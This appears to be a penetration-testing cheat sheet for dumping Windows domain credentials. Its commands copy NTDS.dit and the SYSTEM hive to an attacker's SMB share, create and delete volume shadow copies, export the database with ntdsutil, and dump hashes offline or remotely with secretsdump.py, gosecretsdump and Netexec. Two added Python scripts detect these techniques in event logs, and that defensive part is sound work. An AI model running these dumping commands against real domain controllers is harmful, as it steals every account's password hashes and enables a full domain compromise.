PRIMARY CATEGORY → WINDOWS CREDENTIALS DUMPING

Exfiltration - Down DC

OS File System
From the Attacker
smbserver.py -smb2support -username <USER> -password <PASSWORD> <SHARE_NAME> <SHARE_PATH>
From the Target
net use X: \\<ATTACKER>\<SHARED_FOLDER> /USER:<USER> <PASSWORD>
Copy-Item -Force -Path 'C:\Windows\NTDS\NTDS.dit', 'C:\Windows\System32\Config\SYSTEM' -Destination 'X:'

Exfiltration - Live DC

VSSAdmin
Creating a Shadow Copy of the Volume
vssadmin CREATE SHADOW /For=C:
Extracting NTDS.dit and SYSTEM from the VSS snapshot (<SHADOW_COPY_NAME> is the "Shadow Copy Volume Name" printed by the create command)
cmd.exe /c copy <SHADOW_COPY_NAME>\Windows\NTDS\NTDS.dit <OUTPUT_FILE>
cmd.exe /c copy <SHADOW_COPY_NAME>\Windows\System32\Config\SYSTEM <OUTPUT_FILE>
Removing the Shadow Copy
vssadmin delete shadows /shadow=<SHADOW_COPY_ID>
NTDSUtil
From the Attacker
smbserver.py -smb2support -username <USER> -password <PASSWORD> <SHARE_NAME> <SHARE_PATH>
From the Target
net use X: \\<ATTACKER>\<SHARED_FOLDER> /USER:<USER> <PASSWORD>
ntdsutil "ac i ntds" "ifm" "create full X:\NTDS" quit quit
Invoke-NinjaCopy.ps1

Invoke-NinjaCopy.ps1 -Path 'C:\Windows\NTDS\NTDS.dit' -LocalDestination 'C:\Windows\Temp\ntds.dit.save'
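The three live-DC techniques above (VSS snapshot plus copy, ntdsutil IFM export, Invoke-NinjaCopy) all leave process-creation traces on the domain controller. The following detection script is an added example, not part of the original page or of any of the tools it lists: it runs a handful of command-line indicator rules over constructed Security 4688 / Sysmon-style records (flattened to key=value lines, with invented hosts, users and timestamps) and correlates the hits per host and account. The field names, the rule names and the severity thresholds are assumptions for the example.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed process-creation records (Security 4688 / Sysmon Event 1 style,
# flattened to key=value for the example). Made-up sample lines, not real
# telemetry: hosts, users, timestamps and paths are invented.
SAMPLE_EVENTS = [
    r'ts=2024-05-01T10:01:02Z host=DC01 user=CORP\svc-backup image=C:\Windows\System32\vssadmin.exe cmdline="vssadmin CREATE SHADOW /For=C:"',
    r'ts=2024-05-01T10:01:40Z host=DC01 user=CORP\svc-backup image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit"',
    r'ts=2024-05-01T10:02:05Z host=DC01 user=CORP\svc-backup image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\Config\SYSTEM C:\Windows\Temp\system.hive"',
    r'ts=2024-05-01T10:03:00Z host=DC01 user=CORP\svc-backup image=C:\Windows\System32\vssadmin.exe cmdline="vssadmin delete shadows /shadow={PLACEHOLDER-SHADOW-ID}"',
    r'ts=2024-05-01T11:15:10Z host=DC01 user=CORP\jdoe image=C:\Windows\System32\ntdsutil.exe cmdline="ntdsutil \"ac i ntds\" \"ifm\" \"create full X:\NTDS\" quit quit"',
    r'ts=2024-05-01T11:20:00Z host=DC01 user=CORP\jdoe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -c Invoke-NinjaCopy.ps1 -Path C:\Windows\NTDS\NTDS.dit -LocalDestination C:\Windows\Temp\ntds.dit.save"',
    # Benign noise: listing shadows and an unrelated process on a file server.
    r'ts=2024-05-01T12:00:00Z host=DC01 user=CORP\svc-backup image=C:\Windows\System32\vssadmin.exe cmdline="vssadmin list shadows"',
    r'ts=2024-05-01T12:05:00Z host=FS01 user=CORP\jdoe image=C:\Windows\notepad.exe cmdline="notepad.exe C:\Users\jdoe\notes.txt"',
]

# key=value tokens; quoted values may contain backslash-escaped quotes.
KV_RE = re.compile(r'(\w+)=(?:"((?:[^"\\]|\\.)*)"|(\S+))')

# Indicator rules, each matched against the command line only (case-insensitive).
RULES = [
    ("vss_shadow_created",     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bcreate\s+shadow\b", re.I)),
    ("vss_shadow_deleted",     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
    ("ntdsutil_ifm_export",    re.compile(r"\bntdsutil(?:\.exe)?\b.*\bifm\b", re.I)),
    ("ntds_dit_referenced",    re.compile(r"\\ntds\\ntds\.dit\b", re.I)),
    ("system_hive_referenced", re.compile(r"\\system32\\config\\system\b", re.I)),
    ("shadow_copy_path_used",  re.compile(r"harddiskvolumeshadowcopy\d+", re.I)),
    ("ninjacopy_invoked",      re.compile(r"invoke-ninjacopy", re.I)),
]
# Indicators that are rarely part of legitimate administration on a DC.
HIGH_CONFIDENCE = {"ntdsutil_ifm_export", "ninjacopy_invoked"}
SENSITIVE_FILES = {"ntds_dit_referenced", "system_hive_referenced"}
SNAPSHOT_ACTIVITY = {"vss_shadow_created", "shadow_copy_path_used"}


def parse_event(line: str) -> Dict[str, str]:
    """Turn one flattened record into a dict, unescaping \\" inside quoted values."""
    fields = {}
    for key, quoted, bare in KV_RE.findall(line):
        fields[key] = (bare if bare else quoted).replace('\\"', '"')
    return fields


def match_indicators(cmdline: str) -> Set[str]:
    return {name for name, rx in RULES if rx.search(cmdline)}


def severity(indicators: Set[str]) -> str:
    """High when a known dumping tool is used, or a sensitive file is read through a snapshot."""
    if indicators & HIGH_CONFIDENCE:
        return "high"
    if indicators & SENSITIVE_FILES and indicators & SNAPSHOT_ACTIVITY:
        return "high"
    return "medium" if indicators else "none"


def scan_events(lines: List[str]) -> List[Dict]:
    """Return one finding per event that triggers at least one indicator."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        indicators = match_indicators(ev.get("cmdline", ""))
        if not indicators:
            continue
        findings.append({
            "ts": ev.get("ts"), "host": ev.get("host"), "user": ev.get("user"),
            "image": ev.get("image"), "indicators": indicators,
            "severity": severity(indicators),
        })
    return findings


def summarize_by_actor(findings: List[Dict]) -> Dict[Tuple[str, str], Dict]:
    """Correlate findings per (host, user): a backup job that only creates
    snapshots stays medium, but snapshot + NTDS.dit copy by the same account is high."""
    by_actor: Dict[Tuple[str, str], Dict] = {}
    for f in findings:
        entry = by_actor.setdefault((f["host"], f["user"]), {"indicators": set(), "events": 0})
        entry["indicators"] |= f["indicators"]
        entry["events"] += 1
    for entry in by_actor.values():
        entry["severity"] = severity(entry["indicators"])
    return by_actor


if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for h in hits:
        print(f'{h["ts"]} {h["host"]} {h["user"]} [{h["severity"]}] {sorted(h["indicators"])}')
    for (host, user), s in summarize_by_actor(hits).items():
        print(f'{host} {user}: {s["events"]} events, overall {s["severity"]}')
```

The per-event view is deliberately noisy (a backup agent creating a shadow copy is medium on its own); the per-actor summary is what a SOC would alert on, since the combination of snapshot creation and a copy of NTDS.dit or the SYSTEM hive by one account is the actual signal, regardless of which of the page's three procedures was used.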

Secrets Dump - Offline

Once the NTDS.dit and SYSTEM files have been obtained, extract the secrets from them as follows →

See the SYSTEM Hive Extraction page for everything related to obtaining that hive.

SecretsDump.py

Offline Dumping

First, both the NTDS.dit and the SYSTEM hive must be extracted from the target.

Then, these files are parsed locally as follows →

secretsdump.py -outputfile <FILE> -ntds <NTDS> -system <SYSTEM> local
Gosecretsdump

Faster for larger NTDS.dit files

gosecretsdump -ntds <NTDS> -system <SYSTEM>

Secrets Dump - Remote

Netexec

DRSUAPI Method
nxc smb <TARGET> --username '<USER>' --password '<PASSWORD>' --ntds drsuapi
VSS Method (Volume Shadow Copy Service)

nxc smb <TARGET> --username '<USER>' --password '<PASSWORD>' --ntds vss
SecretsDump.py

Regarding authentication, the other approaches covered on the Authentication page can also be used when extracting the NTDS.dit.

DRSUAPI

Standard Method

  • Extract all data for all users
secretsdump.py '<DOMAIN/WORKGROUP>/<USER>:<PASSWORD>@<TARGET>'
  • Extract data from a given user
secretsdump.py -just-dc-user <USER> '<DOMAIN/WORKGROUP>/<USER>:<PASSWORD>@<TARGET>'
  • NTLM Hashes Only (-just-dc-ntlm)
secretsdump.py -just-dc-ntlm '<DOMAIN/WORKGROUP>/<USER>:<PASSWORD>@<TARGET>'
  • NTLM Hashes and Kerberos Keys (-just-dc)
secretsdump.py -just-dc '<DOMAIN/WORKGROUP>/<USER>:<PASSWORD>@<TARGET>'
NTDSUTIL / VSS Method (-use-vss, instead of the default DRSUAPI)
secretsdump.py -just-dc-ntlm -use-vss '<DOMAIN/WORKGROUP>/<USER>:<PASSWORD>@<TARGET>'
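The DRSUAPI path used by both nxc --ntds drsuapi and secretsdump.py's default mode never touches the NTDS.dit file: it asks the DC to replicate the objects, so the host-side indicators above do not fire. What does fire is Security event 4662 on the DC, recording the replication control access rights exercised on the domain object. The script below is an added example, not part of the original page or of impacket/Netexec: it checks constructed 4662 records (flattened to key=value, with invented hosts, users and timestamps) for the replication-right GUIDs and alerts when the subject is not a known replicator. The allowlist KNOWN_REPLICATORS and the field names are assumptions for the example; the GUIDs are the real extended-right identifiers.

```python
import re
from typing import Dict, List, Set

# Extended rights that the DRSUAPI replication call exercises on the domain
# object. DS-Replication-Get-Changes-All is the one needed to obtain secret
# attributes, so it carries the higher severity.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals expected to replicate: DC computer accounts and any sanctioned
# directory-sync service account. ASSUMPTION for the example; populate from
# your own environment.
KNOWN_REPLICATORS = {"CORP\\DC01$", "CORP\\DC02$", "CORP\\svc-adsync"}

# Constructed Security 4662 (Directory Service access) records flattened to
# key=value. Made-up sample lines, not real telemetry. The objecttype value
# 19195a5b-... is the domainDNS class; properties lists the rights exercised.
SAMPLE_4662 = [
    r'ts=2024-05-01T09:00:00Z host=DC01 eventid=4662 subject=CORP\DC02$ objecttype=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} accessmask=0x100 properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"',
    r'ts=2024-05-01T09:30:12Z host=DC01 eventid=4662 subject=CORP\jdoe objecttype=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} accessmask=0x100 properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"',
    r'ts=2024-05-01T09:31:00Z host=DC01 eventid=4662 subject=CORP\jdoe objecttype=%{PLACEHOLDER-CLASS-GUID} accessmask=0x10 properties="{PLACEHOLDER-ATTRIBUTE-GUID}"',
    r'ts=2024-05-01T10:00:00Z host=DC01 eventid=4662 subject=CORP\svc-adsync objecttype=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} accessmask=0x100 properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"',
    r'ts=2024-05-01T10:05:00Z host=DC01 eventid=4662 subject=CORP\svc-backup objecttype=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} accessmask=0x100 properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"',
    r'ts=2024-05-01T10:06:00Z host=DC01 eventid=4624 subject=CORP\svc-backup',
]

KV_RE = re.compile(r'(\w+)=(?:"((?:[^"\\]|\\.)*)"|(\S+))')
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)


def parse_event(line: str) -> Dict[str, str]:
    """Turn one flattened record into a dict of field -> value."""
    return {k: (bare if bare else quoted) for k, quoted, bare in KV_RE.findall(line)}


def replication_rights(properties: str) -> Set[str]:
    """Names of the replication rights whose GUIDs appear in the Properties field."""
    return {REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS}


def detect_replication(lines: List[str], allowlist: Set[str]) -> List[Dict]:
    """Alert on 4662 events where a non-allowlisted principal exercised a
    replication right. Allowlist comparison is case-insensitive."""
    allowed = {a.upper() for a in allowlist}
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("eventid") != "4662":
            continue
        rights = replication_rights(ev.get("properties", ""))
        if not rights:
            continue  # ordinary directory read/write, not replication
        subject = ev.get("subject", "")
        if subject.upper() in allowed:
            continue  # a DC or sanctioned sync account; expected traffic
        alerts.append({
            "ts": ev.get("ts"), "host": ev.get("host"), "subject": subject,
            "object_type": ev.get("objecttype", "").strip("%{}"),
            "rights": rights,
            "severity": "high" if "DS-Replication-Get-Changes-All" in rights else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in detect_replication(SAMPLE_4662, KNOWN_REPLICATORS):
        print(f'{a["ts"]} {a["host"]} {a["subject"]} [{a["severity"]}] {sorted(a["rights"])}')
```

Two caveats for production use: 4662 only appears if the DC audits "Directory Service Access" for success, and the allowlist has to be maintained (a new DC or sync server shows up as a false positive until it is added). Conversely, a principal that is not on the list but holds these rights is itself a finding worth reviewing, since those rights are what makes the secretsdump and nxc commands above work.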